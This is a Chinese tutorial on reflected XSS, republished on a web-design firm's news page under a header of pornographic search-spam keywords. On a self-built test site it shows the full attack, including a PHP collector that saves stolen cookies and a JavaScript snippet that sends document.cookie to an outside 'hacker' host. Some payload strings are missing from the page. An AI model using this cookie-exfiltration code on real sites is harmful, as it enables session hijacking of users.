日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
反射型xss實戰(zhàn)演示

我們知道,XSS攻擊大致分為三種類型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最廣的一種攻擊方式。它通過給別人發(fā)送帶有惡意腳本代碼參數(shù)的URL,當URL地址被打開時,特有的惡意代碼參數(shù)被HTML解析、執(zhí)行。它的特點是非持久化,必須用戶點擊帶有特定參數(shù)的鏈接才能引起。

創(chuàng)新互聯(lián)專注于安龍企業(yè)網(wǎng)站建設,響應式網(wǎng)站設計,電子商務商城網(wǎng)站建設。安龍網(wǎng)站建設公司,為安龍等地區(qū)提供建站服務。全流程定制網(wǎng)站設計,專業(yè)設計,全程項目跟蹤,創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務

今天,通過一個反射型xss的實戰(zhàn)演示,讓大家詳細了解這種攻擊方式。

準備工作:

(1) 一個有反射型xss漏洞的網(wǎng)站(自己搭的虛擬站點,域名為xsstest.qq.com),該域名下有一個首頁(index.html),一個登陸頁面(login.html),一個登陸的cgi(login.php),一個用于搜索的cgi(search.php)。界面如下:

由于xss漏洞一般發(fā)生于與用戶交互的地方,因此搜索框是我們關注的重點。

(2)我們自己的黑客網(wǎng)站(另一個虛擬站點 hacker.qq.com)。該域名下有一個hack.php,用以收集用戶的cookie,一個hacker.js用以向hack.php發(fā)請求。

發(fā)現(xiàn)漏洞

我們首先需要找出站點的xss漏洞發(fā)生在什么地方,上面提到,與用戶交互的地方是我們的主要關注點。好,現(xiàn)在我們隨意輸入幾個字符“計算機”,點擊搜索:

搜索界面如下(這是自己寫的一個簡陋的搜索界面):

這里發(fā)現(xiàn)了我們輸入的字符出現(xiàn)在了搜索界面上(很多電商網(wǎng)站應該都是這種界面頁面形式吧)。好,這次我們輸入一些特殊字符來試試“”,點擊搜索:

出現(xiàn)了我們心儀的小彈窗,看來search.php未對用戶輸入的關鍵詞作任何處理,便直接輸出到界面上,既然xss漏洞出現(xiàn),那么便可以開始實施攻擊了,這次攻擊的目的是盜取用戶的cookie。

實施攻擊

首先我們來寫我們自己的手機cookie CGI(hack.php),代碼如下:

 
 
 
  1. $cookie = $_GET['q']; 
  2. var_dump($cookie); 
  3. $myFile = "cookie.txt"; 
  4. file_put_contents($myFile, $cookie); 
  5. ?> 

接著寫發(fā)送請求的hacker.js,代碼如下:

var img = new Image();
img.src = "http://hacker.qq.com/hack.php?q="+document.cookie;
document.body.append(img);

好的,現(xiàn)在可以構造一個連接來欺騙用戶了:

點擊就送998 

看search.php 后的q參數(shù) ,解碼后為

實際的作用是模擬用戶在搜索框中輸入

后點擊搜索。search.php未經(jīng)處理的將其直接輸入到頁面,使其在html文檔中有了新的語義。它會加載hacker.qq.com域下的haker.js。

好,當用戶登陸了網(wǎng)站后,再欺騙用戶點擊這個鏈接,這時候,看hacker.qq.com域下,發(fā)現(xiàn)多了一個cookie.txt文件,打開來:

發(fā)現(xiàn)用戶用于登陸的賬號,密碼都在內(nèi),密碼是經(jīng)過加密的。OK,現(xiàn)在我們便可以拿著這個cookie來獲取用戶的登陸態(tài)了。

整個攻擊過程結(jié)束。

當然,現(xiàn)實過程中,很少有網(wǎng)站有如此明顯的xss漏洞。這里只是給大家示范了一下反射型xss的原理,現(xiàn)實中的漏洞雖然五花八門,但是本質(zhì)是不變的。大家可以進一步研究。


標題名稱:反射型xss實戰(zhàn)演示
網(wǎng)頁URL:http://www.dlmjj.cn/article/dpsdege.html